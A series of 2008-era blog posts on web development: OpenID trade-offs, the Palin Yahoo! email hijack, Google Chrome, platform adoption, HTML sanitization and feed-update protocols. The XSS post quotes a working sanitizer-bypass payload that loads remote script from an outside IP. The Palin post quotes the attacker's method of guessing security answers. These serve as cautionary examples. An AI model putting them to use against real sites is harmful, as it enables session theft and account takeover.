I have this dream that one day we will see true interoperability between social networking sites potentially powered by OpenID. As part of trying to make this dream a reality I've been reading a lot about the pros and cons of implementing OpenID since a shared identity system is the cornerstone of any hope of getting interoperability to work across social networking sites. Here are some of the things I've learned.

The Problems OpenID Solves for Web Developers

There are two ways to approach using OpenID on your Web site.  The first way is to treat OpenID as a way to delegate user authentication on your site to another service. This means that you rely on someone else to authenticate (i.e. sign-in/log-in) the user and take their word for it that the user is who he/she claims to be. Some sites use this as the sole means of authenticating users (e.g. StackOverflow) while others give users the choice of either creating an account on the site or using an OpenID provider (e.g. SourceForge). The assumption behind this view of OpenID is that asking users to create yet another username/password combo for your site is a barrier to adoption and using OpenID removes this barrier. However this assumption is only correct if the OpenID sign-in process is easier for users than registering a new account on your site.

The second approach is to use OpenID as a way to give users of other Web sites access to features of your site that are traditionally only available to your users. For example, Google's Blogger has an option to enable anyone with an OpenID to comment on your blog. However Blogger does not allow you to login with OpenID instead you must have a valid Google account to create a blog on their service. In this scenario, the assumption is that asking users to create yet another username/password combo just to leave a comment on a blog or use some other feature of the site is too high of a barrier to entry but that same barrier to entry is acceptable for people who want to become full users of the site.

It should be noted that the second approach is actually why OpenID was originally invented but scope creep has made it become a popular choice as a single sign-in solution. 

The Ideal OpenID User Experience

As a Web developer, the main problem OpenID is supposed to solve for you is that it reduces the barrier to using your service. This means that if redirecting a user to an OpenID provider to be authenticated and then having them redirect the user back to your site is more complicated than a new user account creation flow you could build on your site then using OpenID will cost you users. The ideal OpenID user experience should be

  1. Your log-in page gives the user a choice of OpenID providers to use to sign in
  2. The user selects their OpenID provider from a list or enters their OpenID provider information
  3. The user is redirected to a log-in page on the provider's site
  4. User enters their credentials
  5. The user is redirected back to your site and is now logged in

Even in this ideal flow, there is a chance you will lose users since you have distracted them from their task of using your site by directing them to another site. The assumption here is that the redirect->sign-in->redirect flow is less cumbersome than asking new users to pick a unique username and password as well as asking them to solve a Human Interactive Proof or CAPTCHA. This sounds like a fair tradeoff although I'm not aware of any published research results that back up this assumption.

However if the OpenID sign-in flow is any more complicated than the above steps then the risk of losing users increases significantly. Here is an example of how OpenID can cost you users taken from a post by Ned Batchelder entitled OpenID is too hard 

Earlier this week I visited yet another site that encouraged me to get an OpenID, and I decided I would finally cross OpenID off my list of technologies I should at least understand and probably use.

The simplest way to use OpenID is to pick a provider like Yahoo, go to their OpenID page, and enable your Yahoo account to be an OpenID. This in itself was a little complicated, because when I was done, I got to a page that showed me my "OpenID identifiers", which had one item in it:

https://me.yahoo.com/a/.DuSz_IEq5Vw5NZLAHUFHWEKLSfQnRFuebro-

What!? What is that, what do I do with it? Am I supposed to paste that into OpenID fields on other sites? Are you kidding me? Also, in the text on that page is a stern warning:

This step is completely optional. After you choose an identifier, you cannot edit or delete it.

(Emphasis theirs). So now I have a mystifying string of junk, with a big warning all over it that I can't go back. "This step" claims it's optional, but I seem to have already done it! Now I'm afraid, and I'm a technical person — you expect my wife to do this?

How many users do you think start this process and complete it successfully? Now how many of these users would have been lost if the site in question had replaced their OpenID usage with a lightweight account creation process similar to that used by reddit.com which only requires username/password and solving a CAPTCHA?

This is food for thought when comparing the costs and benefits of adopting OpenID.

The Risks of Using OpenID

There are lots of commonly voiced criticisms about OpenID, a number of which are captured in the blog post entitled The problem(s) with OpenID by Stefan brands. A few of the complaints are only interesting if you are a hardcore identity geek while others are of general interest to any Web developer considering adopting OpenID. Some of the key criticisms include

  • Susceptibility to Phishing: The argument here is that the growing popularity of OpenID will train users into thinking that it is OK to enter their credentials on a "trusted site" after following a link from another Web site. However given that this is how phishing works it is also training users to be more susceptible to phishing since any random site can now claim to be powered by OpenID when in truth it redirects people to http://www.example.com/phishingattempt/yahoo.com/login or some similarly malicious URL.

    Given that we live in a world where worse practice of Please Give Us Your Email Password is now commonplace and the best solution people have come up with for dealing with it (OAuth) also utilizes browser-based redirection, I'm not sure this is a fair criticism against OpenID.

  • Identity Providers May Be Lax about Validating Users: When you outsource user authentication to an identity provider via OpenID you are trusting that they are performing some minimum level of user validation to keep spammers and bots out of their service. However there is no requirement that they do that at all nor is there any minimum standard that they have to meet. A year ago, Tim Bray posted an interesting thought experiment where he pointed out that one could create an identity provider that "successfully authenticated" any user URL you provided it with. You can imagine what kind of fun spammers would have with such an identity provider on a site like StackOverflow.

  • Identity Providers May Recycle Identities: A number of large email service providers like Yahoo! and AOL have decided to become OpenID identity providers. Email service providers typically recycle abandoned email accounts after a set period of time. For example, if I don't sign-in to my dare@example.com email address after three months then all my data is wiped and that account joins the pool of available email accounts. What happens to my accounts on other sites where I use that email address as my OpenID? Does this mean that the next person to use that email address can log-in to StackOverflow as me? Maybe…it depends on quality of the identity provider.

  • Privacy Concerns: Delegating user authentication to another service means you are letting this other service know every time a user logs in to your site and often times what the user was trying to do since you pass along a return URL. Depending on the sensitivity of your site, this may be information that you would rather not leak about your users. Then again, most Web developers don't care about this given how much information about their users they let Web analytics firms and advertising providers track.

White Lists are Key

The bottom line is that accepting an Tom, Dick and Harry as an identity provider on your site is probably a bad idea. User authentication is an important aspect of an online service and delegating it to others without vetting them is not a wise given how widely the user experiences and the policies of various identity providers can vary. Developers should evaluate OpenID providers, then select a subset those whose policies and sign-in experience is compatible with their goals to avoid the risk of losing or alienating users. 

Now Playing: The Game Ft. Ice Cube - State Of Emergency


 

Categories: Web Development

I recently read that Sarah Palin's Yahoo! email accounts had been hacked. What is interesting about the hack is that instead of guessing her password or finding a security flaw in Yahoo's email service, the hacker used the forgot your ID or password feature and a search engine. The Threat Level blog on Wired has posted an email from the hacker in a post entitled Palin E-Mail Hacker Says It Was Easy which is excerpted below

rubico 09/17/08(Wed)12:57:22 No.85782652

Hello, /b/ as many of you might already know, last night sarah palin’s yahoo was “hacked” and caps were posted on /b/, i am the lurker who did it, and i would like to tell the story.

In the past couple days news had come to light about palin using a yahoo mail account, it was in news stories and such, a thread was started full of newfags trying to do something that would not get this off the ground, for the next 2 hours the acct was locked from password recovery presumably from all this bullshit spamming.

after the password recovery was reenabled, it took seriously 45 mins on wikipedia and google to find the info, Birthday? 15 seconds on wikipedia, zip code? well she had always been from wasilla, and it only has 2 zip codes (thanks online postal service!)

the second was somewhat harder, the question was “where did you meet your spouse?” did some research, and apparently she had eloped with mister palin after college, if youll look on some of the screenshits that I took and other fellow anon have so graciously put on photobucket you will see the google search for “palin eloped” or some such in one of the tabs.

I found out later though more research that they met at high school, so I did variations of that, high, high school, eventually hit on “Wasilla high” I promptly changed the password to popcorn and took a cold shower…

The fundamental flaw of pretty much every password recovery feature I've found online is that what they consider "secret" information actually isn't thanks to social networking, blogs and even Wikipedia. Yahoo! Mail password recovery relies on asking you your date of birth, zip code and country of residence as a proof of identity. Considering that this is the kind of information that is on the average Facebook profile or MySpace page, it seems ludicrous that this is all that stops someone from stealing your identity online.

Even the sites that try to be secure by asking more personal questions such as "the name of your childhood pet" or "where you met your spouse" fail because people often write about their childhood pets and tell stories about how they met on weddings sites all over the Web.

Web developers need start considering whether it isn't time to put password recovery features based on asking personal questions to pasture. I wonder how many more high profile account hijackings it will take before this becomes as abhorred a practice as emailing users their forgotten passwords (you know why this is wrong right?)

Now Playing: DJ Khaled - She's Fine (Feat. Sean Paul, Missy Elliot & Busta Rhymes)


 

Categories: Web Development

Chris Jones has a blog post entitled Building Windows Live where he talks about the what all of us on Windows Live have been working on over the past year. He writes

We have spent the last year working on our next major wave of releases for Windows Live. This wave is part of our ongoing work to build a great set of communication and sharing experiences that help keep your life in sync. This wave includes significant updates to our software applications for your Windows PC, and in the next few hours, we will release public betas of the latest version of the Windows Live suite of PC applications, including Messenger, Mail, Photo Gallery, Movie Maker, Writer, Toolbar, and Family Safety. You’ll find new features across the products and most notably, Windows Live Messenger has been almost entirely redesigned. I’m sure many of you will have questions, and, over the coming weeks, we’ll have individuals from the engineering team share more about what we have built and why we made the investments we made. Our intent is to post regularly to this blog, and if there are topics you think we should cover, please leave a comment or send me an e-mail at chris.jones@microsoft.com.

It seems the download links were found early by those intrepid correspondents over at LiveSide and a number of people have already started trying the new versions out. The download URLs are http://g.live.com/1rebeta3/en/wlsetup-web.exe and http://g.live.com/1rebeta3/en/wlsetup-all.exe depending on whether you want to download a subset of the Windows Live desktop applications or all of them.

I probably won't be blogging in detail about what I've worked on over the past few months until the products are out of beta but I will leave with this screenshot from Darren Neimke's post Loving the new Live Beta’s.

I'm sure you can guess which of the features called out above I worked on.

PS: My favorite thing about the new wave of Windows Live products is that the world now has a seamless calendar sharing solution that works. If Omar doesn't write something similar first, I'll probably throw a blog up about how my wife and I plan to use Outlook + Outlook Connector and Windows Live Mail + Windows Live Calendar to share our schedules so I no longer miss birth center appointments. :)

Now Playing: DJ Khaled - Go Hard (Feat. Kanye West & T-Pain)


 

Categories: Windows Live

September 15, 2008
@ 04:12 PM

A few weeks ago Google released the beta of Google Chrome, a new Web browser based on WebKit. Since then there has been a lot of interesting hype and backlash against the hype about Chrome. Two great examples of the hype and the corresponding backlash are Mike Arrington's Meet Chrome, Google’s Windows Killer and Ted Dziuba's article Chrome-fed Googasm bares tech pundit futility in response.

The best way to think about Google Chrome is to understand how Google thinks about the Web. Nick Carr has a post entitled The Omnigoogle which does a great job of capturing a sentiment I've seen expressed by every Google employee I've ever talked to from senior people like Sergey Brin and Vint Cerf to front line folks Dewitt Clinton and Kevin Marks. Nick Carr writes

But while Google is an unusual company in many ways, when you boil down its business strategy, you find that it’s not quite as mysterious as it seems. The way Google makes money is straightforward: It brokers and publishes advertisements through digital media. More than 99 percent of its sales have come from the fees it charges advertisers for using its network to get their messages out on the Internet.

Google’s protean appearance is not a reflection of its core business. Rather, it stems from the vast number of complements to its core business. Complements are, to put it simply, any products or services that tend be consumed together. Think hot dogs and mustard, or houses and mortgages. For Google, literally everything that happens on the Internet is a complement to its main business. The more things that people and companies do online, the more ads they see and the more money Google makes. In addition, as Internet activity increases, Google collects more data on consumers’ needs and behavior and can tailor its ads more precisely, strengthening its competitive advantage and further increasing its income. As more and more products and services are delivered digitally over computer networks — entertainment, news, software programs, financial transactions — Google’s range of complements expands into ever more industry sectors. That's why cute little Google has morphed into The Omnigoogle.

Because the sales of complementary products rise in tandem, a company has a strong strategic interest in reducing the cost and expanding the availability of the complements to its core product. It’s not too much of an exaggeration to say that a company would like all complements to be given away. If hot dogs became freebies, mustard sales would skyrocket. It’s this natural drive to reduce the cost of complements that, more than anything else, explains Google’s strategy.

This boils down to the corporate ideology that "anything that is good for the Web is good for Google". This means Google is in favor of anything that increases the breadth of the Web which explains why it is investing in O3b networks in an effort intended to bring the Web to 3 billion people in emerging markets. The more people there are using the Web, the more people there are viewing ads on Google's services and on pages of sites that use AdSense and DoubleClick ads. This also means that Google is in favor of moving as much media consumption as possible to the Web. This explains why purchasing YouTube was so important. In addition to purchasing the number one video site on the Web, Google also ensured that it would be on the front line of defending video on the Web given that YouTube was in the cross hairs of various corporate content owners. This focus on expanding the breadth of the Web also explains why they have purchased startups like Zenter, Upstartle and 2Web Technologies to create a Google office suite in an attempt to unseat the current breed of desktop based office productivity software. It explains why they created Gmail as a way to make Web-based email as satisfying or even more satisfying than desktop mail experiences especially when compared to other Webmail offerings at the time. This ideology also explains why the company invests in Android and so on..

The media has tried to make it seem like Google spits out a bunch of random, unfocused projects without much thought besides "shipping something cool". However this is far from the case. Google is the most successful company on the Web and it believes that its fortunes are directly tied to the increased usage and evolution of the Web. This means Google has a strong incentive to improve the capabilities of the Web as a delivery vehicle for user experiences. Google had telegraphed their intent to take a more direct role in the evolution of Web technologies in a few ways. For one, the company hired Ian Hickson who had been rallying browser vendors to start improving Web technologies like HTML via the Web Hypertext Applications Technology Working Group (WHAT WG). His success in these efforts since joining Google has led to HTML 5 becoming an official W3C effort. Secondly, Google also heavily supported Firefox both by hiring developers who worked on Firefox full time and via a search affiliate program that brings in millions for the Mozilla corporation [Ed note – Google has a similar deal with Opera]. However the relationship with Firefox clearly was not evolving the Web at a pace that Google found satisfactory as evidenced by the creation of Google Gears a product which Google evangelists have positioned as a bleeding edge HTML 5 implementation even though it implements capabilities not mentioned in HTML 5. 

However even with having a seat at the table in defining HTML 5 and being a significant sponsor of the second most popular Web browser, Google still did not have a direct way to push the evolution of the Web directly to users. They were still dependent on the pace of innovation of incumbent browser vendors or figuring out how to distribute a browser plug-in by convincing companies like MySpace to take a dependency on it. This was clearly an uphill battle. Thus creating their own Web browser was inevitable.

So why is this significant? It isn't because "Google Chrome is going to replace Windows" or some other such silliness. As it stands now, Google Chrome is a Windows based application whose most interesting features exist in other browsers. A Web browser cannot replace an operating system any more than an automobile can replace an Interstate highway. The significant end user innovation in Google Chrome is that it is bundled with Google Gears. This means that Google Chrome has a mechanism for delivering richer experiences to end users out of the box. Google can now use this as a carrot and a stick approach to convincing browser vendors to do what it wants. Google can make its sites work better together with Chrome + Gears (e.g. YouTube Uploader using Gears) which could lead to lost browser market share for competing browser vendors if this becomes a widespread practice among Google's offerings. Even if Google never does this, the implied threat is now out there.

Chrome will likely force Google's competitors to up their game with regards to adopting newer Web standards and features just to stay competitive. This is similar to what Google did with online mapping and Web mail, and what the Opera browser has been doing by pioneering features like "pr0n mode" and tabbed browsing. So even if Google loses because Chrome doesn't get massively popular, Google still wins because the user experience for browsing the Web has been improved.  And at the end of the day, if more people are using the Web because the user experience is better across the board that's just fine for Google. The same way the fact that all online mapping experiences and Web mail experiences have improved across the board is also good for Google.

Now Playing: Metallica - The Judas Kiss


 

With the releases of betas of Google Chrome and Internet Explorer 8 as well as the recent release of Firefox 3, the pundits are all in a tizzy about the the new browser wars. I don't know if it is a war or not but I do like the fact that in the past few months we've seen clear proof that the end user experience when browsing the Web is going to get an upgrade for the majority of Web users.

Whenever there is such active competition between vendors, customers are typically the ones that benefit and the "new browser wars" are no different. Below are some of the features and trends in the new generation of browsers that has me excited about the future of the Web browsing user experience

One Process Per Tab

As seen in: IE 8 beta, Chrome

With this feature browsers are more resilient to crashes since each tab has its own process so a bug which would cause the entire browser to crash in an old school browser only causes the user to lose the tab in next generation browser. This feature is called Loosely Coupled IE (LCIE) in Internet Explorer 8 and described in the documentation of the Chrome Process Manager in the Google Chrome Comic Book.

This feature will be especially welcome for users of add-ons and browser toolbars since the IE team has found that up to 70% of browser crashes are caused by extensions and now these crashes will no longer take down the entire browser.

Smarter Address Bars

As seen in: IE 8 beta, Chrome, Firefox 3

Autocomplete in browser address bars has been improved. Instead of trying to match a user entered string as the start of a URL (e.g. "cn" autocompletes to http://cnn.com) newer browsers match any occurrence of the string in previously seen URLs and page titles (e.g. "cn" matches http://cnn.com, http://google.cn and a blog post on Wordpress with the title "I've stopped watching CNN").  Like Mark Pilgrim, I was originally suspicious of this feature but now cannot live without it.

This feature is called AwesomeBar in Firefox 3, OmniBox in Google Chrome and Smart Address Bar in IE 8.

Restoring Previous Browsing Sessions

As seen in: Firefox 3, Chrome, IE 8 beta

I love being able to close my browser and restart my operating system safe in the knowledge that whenever I launch the browser it is restored to exactly where I left off. Both Firefox and Chrome provide an option to make this behavior the default but the closest I've seen to getting a similar experience in the betas of IE 8 requires a click from the "about:Tabs" page. However given "about:Tabs" is my start page it gives maximum flexibility since I don't have to be slowed down by the opening up the four or five previously open browser tabs every time I launch my browser.

Search Suggestions

As seen in: IE 8 beta, Chrome, Firefox 3

In the old days, the only way to get search suggestions when typing a search query in your browser's search box was if you had a vendor specific search toolbar installed (e.g. Google Suggest for Firefox). It is becoming more commonplace for this to be native functionality of the Web browser. Google Chrome supports this if the default search provider is Google.  IE 8 beta goes one better by making this feature a platform that any search engine can plug into and currently provides search suggestions for the following search providers; Wikipedia, Amazon, Google, Live Search and Yahoo! as at this writing. 

Updated: Firefox has also supported search suggestions using a provider model since Firefox 2 via OpenSearch and ships with suggestions enabled for Google and Yahoo! by default.

Offline Support

As seen in: Chrome, IE 8 beta, Firefox 3

The WHAT WG created specifications which describes secure mechanisms for Web applications to store large amounts of user data on a local system using APIs provided by modern Web browsers. Applications can store megabytes of data on the user's local machine and have it accessible via the DOM. This feature was originally described in the Web Applications 1.0 specification and is typically called DOM Storage. You can read more about it in the Mozilla documentation for DOM Storage and the IE 8 beta documentation for DOM Storage. The related APIs are currently being defined as part of HTML 5.

Chrome supports this functionality by bundling Google Gears which is a Google defined set of APIs for providing offline storage. 


The most interesting thing about this list is that if you follow the pronouncements from various pundits on sites like Techmeme, you'd think all of these features were originated by Google and appeared for the first time in Chrome.

Update: An amusing take on the pundit hype about Google Chrome from Ted Dziuba in The Register article Chrome-fed Googasm bares tech pundit futility

Now Playing: Metallica - Cyanide


 

Categories: Technology | Web Development

I've been thinking a lot about platform adoption recently. I guess it is the combination of the upcoming Microsoft PDC and watching the various moves in the area of social networking platforms like OpenSocial and fbOpen. One thing that is abundantly clear is that the dynamics that drive platform adoption are amazingly consistent regardless of whether you are talking about operating system platforms like Windows' Win32 and *nix's POSIX, cloud computing platforms like Amazon's EC2 + EBS + S3 and Google App Engine, or even data access APIs like the Flickr API and Google's GData.

When a developer adopts a platform, there is a value exchange between the developer and the software vendor. The more value that is provided to developers by the platform vendor, the more developers are attracted to the platform. Although this seems self evident, where providers of platforms go astray is that they often don't understand the value developers actually want out of software platforms and instead operate from an if we build it they will come mentality. 

There are three main benefits adoption of one platform over another can offer a developer. These benefits are captured in the following "laws" of platform adoption  

  1. Developers adopt a platform when it offers differentiation from competitors: In competitive software markets, building an application that stands out from the crowd is important. Platforms or technologies that enable developers to provide features that are unique to the application, even just temporarily, are thus valuable to developers in such markets. Typically, if these features are truly valuable to end users this leads to a "keeping up with the Joneses" effect where the majority applications in that space eventually adopt this platform. Recent examples of this include Flash video, AJAX and the Flickr API.

  2. Developers adopt a platform when it reduces the cost of software development: Building software is a labor intensive, complicated and error prone process which often results in failure. This makes software development an expensive undertaking. Platforms which reduce the cost of development are thus very valuable to developers. Platforms like Java and the .NET Framework reduced the cost of software development compared to building applications using C and C++. In recent years, platforms based on dynamic languages such as Ruby On Rails and Django have become increasingly popular for building Web applications as they offer simpler development options compared to using "enterprise" platforms like Java.

  3. Developers adopt a platform when it provides reach and/or better distribution: Every platform choice places a limit on which users the developer can reach. Building a Facebook application limits you to building applications for Facebook users, building an iPhone application limits you to people running Apple's phone and building an AJAX application limits you to users of modern browsers who don't have JavaScript disabled. In all of the aforementioned cases, the reach of the application platform is in the millions of users. Additionally, in all of the aforementioned cases there are alternative platforms that developers could choose that do not as many addressable end users and thus have less reach. 

    Distribution is another value add that modern platforms have begun to offer which augments the reach of the platform. The Facebook platform offers several viral distribution mechanisms for applications which enables applications to get noticed by end users and spread organically among users without explicit action by the developer. The Apple iPhone has the App Store which is the single, well-integrated entry point for users to discover and purchase applications for the device. Thus even though the iPhone may have users than other smart phone platforms, targeting the iPhone platform may still be more attractive than targeting other platforms due to its superior distribution channel for applications built on its platform. 

Sometimes developers adopt platforms due to external effects such as management mandate or peer pressure but even in these cases the underlying justification is usually one or more of the benefits above. These laws mean different things for the various participants in the software ecosystem.

  • For software vendors, they clarify that delivering a software platform isn't just about delivering a technology or a set of APIs. The value proposition to developers with regards to the three laws of adoption must be clearly shown to get developers to accept the platform. Smart platform vendors should pick one or more of these axes as the value proposition of their platform and hammer it home. Good examples of these approaches include how Google has been hammering home the 'reach' benefit of adopting OpenSocial or how Erlang evangelists have been pitching it as a solution to the multicore crises given that building concurrent applications is still an expensive endeavor in today's popular programming languages. 

  • For developers, they explain how to evaluate a platform and why some platforms get traction among their peers while others do not. So if you are a fan of the Common Lisp or the Pownce API, these laws of platform adoption explain why developers have flocked to other platforms in their stead.

Now Playing: Pink - So What


 

Categories: Platforms | Programming

Update: A blog post on the official Google blog entitled A fresh take on the browser states that the comic book went out early. It was supposed to show up tomorrow in tandem with the launch of the beta of Google Chrome which will be available in over 100 countries.

Phillipp Lessen was sent an announcement in the form of a comic book which gives the details on an upcoming Open Source browser project from Google. He gives the details and links to scanned images of the comic in his post Google Chrome, Google’s Browser Project. His site seems to have been running slow so he took down links to the scans. I managed to grab them and have uploaded them to a folder on Windows Live SkyDrive. The link is embedded below and the comic can be accessed directly from here.

The key features of Chrome according to the comic are

  • Based on WebKit
  • Each browser tab gets it's own process and Javascript execution is actually multithreaded instead of single threaded as it is in most modern browsers. This actually solves lots of memory problems with modern browsers since it reduces memory fragmentation and mitigates the impact of memory leaks since all memory is reclaimed when the bad Website's browser tab is closed.
  • Task manager shows how much resources each tab is using so you can tie resource usage to individual Web pages.
  • Created Javascript VM from scratch which has clever optimizations like just-in-time compilation and incremental garbage collection.
  • Each tab has it's own URL box and can effectively be considered it's own browser Window.
  • OmniBox URL bar is similar to AwesomeBar in Firefox 3 and the smart address bar in IE 8.
  • Instead of "about:blank" the default homepage shows our nine most visited Web pages and four most used search engines
  • Has an incognito mode where no browser history is saved and cookies are wiped out when the browser is closed. Some people have affectionately dubbed such features pr0n mode. Amusingly, the comic uses the same "planning a surprise birthday party" scenario that the Internet Explorer team used when describing a similar feature in IE 8. 
  • Pop ups are not modal and scoped to the tab which they were spawned from. However they can be promoted to becoming their own tab.
  • There is a "streamlined" mode where the URL box and browser toolbar are hidden so only the Web page is visible.
  • Web pages are sandboxed so that if the user hits a malware site it cannot access the user's computer and perform drive-by downloads or installations.
  • The sandbox model is broken by browser plugins (e.g. Flash) but this is mitigated by having the plugin execute in it's own separate process that is different from that of the browser's rendering engine.
  • The browser will continuously phone home to Google to get a list of known malware sites so that the user is warned when they are visited.
  • Will ship with Google Gears built-in

My initial thoughts on this are that this is a smart move on Google's part. Google depends on the usage and advancement of the Web for its success. However how quickly the Web is advanced is in the hands of browser vendors which probably doesn't sit well with them which is why they created Gears in the first place and hired the guy driving HTML 5. Chrome now gives them an even larger say in which way the Web goes.

As for their relationship with Firefox, it may be mutually beneficial financially since Mozilla gets paid while Google gets to be the search default in a popular browser but it doesn't mean Google can dictate their technical direction. With Chrome, has a way to force browser vendors to move the Web forward on their terms even if it is just by getting users to demand the features that exist in Chrome.

PS: Am I the only one that thinks that Google is beginning to fight too many wars on too many fronts. Android (Apple), OpenSocial (Facebook), Knol (Wikipedia), Lively (IMVU/SecondLife), Chrome (IE/Firefox) and that's just in the past year.

Now Playing: Boys Like Girls - Thunder


 

I'm often surprised by how common it is for developers to prefer reinventing the wheel to using off-the-shelf libraries when solving problems tasks. This practice isn't limited to newbies who don't know any better but also to experienced developers who should. Experienced developers often make excuses about not wanting to take unnecessary dependencies or not trusting the code of others when justifying reinventing the wheel. For example, take this conversation that flowed through my Twitter stream yesterday

Jon Galloway
jongalloway: @
codinghorror Oh, one last thing - I'd rather trust the tough code (memory management, SSL, parsing) to experts and common libraries. about 11 hours ago from Witty in reply to codinghorror

Jeff Atwood
codinghorror @jongalloway you're right, coding is hard. Let's go shopping! about 12 hours ago from web in reply to jongalloway

Jeff Atwood
codinghorror @jongalloway I'd rather make my own mistakes (for things I care about) than blindly inherit other people's mistakes. YMMV. about 12 hours ago from web in reply to jongalloway

The background on this conversation is that Jeff Atwood (aka codinghorror) recently decided to quit his job and create a new Website called stackoverflow.com. It is a question and answer site for asking programming questions where users can vote on the best answers to specific questions. You can think of it as Yahoo! Answers but dedicated to programming questions. You can read a review of the site by Michiel de Mare for more information.

Recently Jeff Atwood blogged about how he was planning to use regular expressions to sanitize HTML input on StackOverflow.com in his blog post entitled Regular Expressions: Now You Have Two Problems where he wrote

I'd like to illustrate with an actual example, a regular expression I recently wrote to strip out dangerous HTML from input. This is extracted from the SanitizeHtml routine I posted on RefactorMyCode.

var whitelist =
 @"</?p>|<br\s?/?>|</?b>|</?strong>|</?i>|</?em>|
  </?s>|</?strike>|</?blockquote>|</?sub>|</?super>|
  </?h(1|2|3)>|</?pre>|<hr\s?/?>|</?code>|</?ul>|
  </?ol>|</?li>|</a>|<a[^>]+>|<img[^>]+/?>";

What do you see here? The variable name whitelist is a strong hint. One thing I like about regular expressions is that they generally look like what they're matching. You see a list of HTML tags, right? Maybe with and without their closing tags?

The problem Jeff was trying to solve is how to allow a subset of HTML tags while stripping out all other HTML so as to prevent cross site scripting (XSS) attacks. The problem with Jeff's approach which was pointed out in the comments by many people including Simon Willison is that using regexes to filter HTML input in this way assumes that you will get fairly well-formed HTML. The problem with that approach which many developers have found out the hard way is that you also have to worry about malformed HTML due to the liberal HTML parsing policies of many modern Web browsers. Thus to use this approach you have to pretty much reverse engineer every HTML parsing quirk of common browsers if you don't want to end up storing HTML which looks safe but actually contains an exploit. Thus to utilize this approach Jeff really should have been looking at using a full fledged HTML parser such as SgmlReader or Beautiful Soup instead of regular expressions.

It didn't take long for the users of StackOverflow.com to show Jeff the error of his ways as evidenced by his post Protecting Your Cookies: HttpOnly where he acknowledges his mistake as follows

So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?

As it turns out, far more dangerous than expected.

Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. 

The sad thing is that Jeff Atwood isn't the first nor will he be the last programmer to think to himself "It's just HTML sanitization, how hard can it be?". There are many lists of Top HTML Validation Bloopers that show tricky it is to get the right solution to this seemingly trivial problem. Additionally, it is sad to note that despite his recent experience, Jeff Atwood still argues that he'd rather make his own mistakes than blindly inherit the mistakes of others as justification for continuing to reinvent the wheel in the future. That is unfortunate given that is a bad attitude for a professional software developer to have.

Rolling your own solution to a common problem should be the last option on your list not the first. Otherwise, you might just end up a candidate for The Daily WTF and deservedly so.

Now Playing: T-Pain - Cant Believe It (feat. Lil Wayne)


 

Categories: Programming

Paul Buchheit of FriendFeed has written up a proposal for a new protocol that Web sites can implement to reduce the load on their services from social network aggregators like FriendFeed and SocialThing. He unveils his proposal in his post Simple Update Protocol: Fetch updates from feeds faster which is excerpted below

When you add a web site like Flickr or Google Reader to FriendFeed, FriendFeed's servers constantly download your feed from the service to get your updates as quickly as possible. FriendFeed's user base has grown quite a bit since launch, and our servers now download millions of feeds from over 43 services every hour.

One of the limitations of this approach is that it is difficult to get updates from services quickly without FriendFeed's crawler overloading other sites' servers with update checks. Gary Burd and I have thought quite a bit about ways we could augment existing feed formats like Atom and RSS to make fetching updates faster and more efficient. Our proposal, which we have named Simple Update Protocol, or SUP, is below.
...
Sites wishing to produce a SUP feed must do two things:

  • Add a special <link> tag to their SUP enabled Atom or RSS feeds. This <link> tag includes the feed's SUP-ID and the URL of the appropriate SUP feed.
  • Generate a SUP feed which lists the SUP-IDs of all recently updated feeds.

Feed consumers can add SUP support by:

  • Storing the SUP-IDs of the Atom/RSS feeds they consume.
  • Watching for those SUP-IDs in their associated SUP feeds.

By using SUP-IDs instead of feed urls, we avoid having to expose the feed url, avoid URL canonicalization issues, and produce a more compact update feed (because SUP-IDs can be a database id or some other short token assigned by the service). Because it is still possible to miss updates due to server errors or other malfunctions, SUP does not completely eliminate the need for polling.

Although there's a healthy conversation about SUP going on in FriendFeed in response to one of my tweets, I thought it would be worth sharing some thoughts on this with a broader audience.

The problem statement that FriendFeed's SUP addresses is the following issue raised in my previous post When REST Doesn't Scale, XMPP to the Rescue?

On July 21st, FriendFeed had 45,000 users who had associated their Flickr profiles with their FriendFeed account. FriendFeed polls Flickr about once every 20 – 30 minutes to see if the user has uploaded new pictures. However only about 6,000 of those users logged into Flickr that day, let alone uploaded pictures. Thus there were literally millions of HTTP requests made by FriendFeed that were totally unnecessary.

FriendFeed's proposal is similar to the Six Apart Update Stream and the Twitter XMPP Firehose in that it is a data stream containing information about all of the updates users are making on a particular service. It differs in a key way in that it doesn't actually contain the data from the user updates but instead identifiers which can be used to determine the users that changed so their feeds can be polled.

This approach aims at protecting feeds that use security through obscurity such as the Google Reader's Shared Items feed and Netflix's Personalized Feeds. The user shares their "secret" feed URL with FriendFeed who then obtains the SUP ID of the user's feed when the feed is first polled. Then whenever that SUP ID is seen in the SUP feed by FriendFeed, they know to go re-poll the user's "secret" feed URL.

For services that are getting a ton of traffic from social network aggregators or Web-based feed readers it does make sense to provide some sort of update stream or fire hose to reduce the amount of polling that gets done. In addition, it also makes sense that if more and more services are going to provide such update streams then it should be standardized so that social network aggregators and similar services do not end up having to target multiple update protocols.

I believe that at the end we will see a continuum of options in this space. The vast majority of services will be OK with the load generated by social networking aggregators and Web-based feed readers when polling their feeds. These services won't see the point of building additional features to handle this load. Some services will run the numbers like Twitter & Six Apart have done and will provide update streams in an attempt to reduce the impact of polling. For these services, SUP seems like a somewhat elegant solution and it would be good to standardize on something, anything at all is better than each site having its own custom solution. For a smaller set of services, this still won't be enough since they don't provide feeds (e.g. Blockbuster's use of Facebook Beacon) and you'll need an explicit server to server publish-subscribe mechanism. XMPP or perhaps something an HTTP based publish-subscribe mechanism like what Joshua Schachter proposed a few weeks ago will be the best fit for those scenarios. 

Now Playing: Jodeci - I'm Still Waiting


 

Categories: Web Development

I've been reading about the Ning vs. WidgetLaboratory drama on TechCrunch. The meat of the conflict seems to be that widgets from WidgetLaboratory were so degrading the user experience of Ning that they had to be cut off. The relevant excerpts from the most recent TechCrunch story on the war of words are below

For those of you not closely following the drama between social network platform Ning and a popular widget provider called WidgetLaboratory, you can read the background here. On Friday Ning unceremoniously shut down their access to Ning, making all those widgets vanish.
...
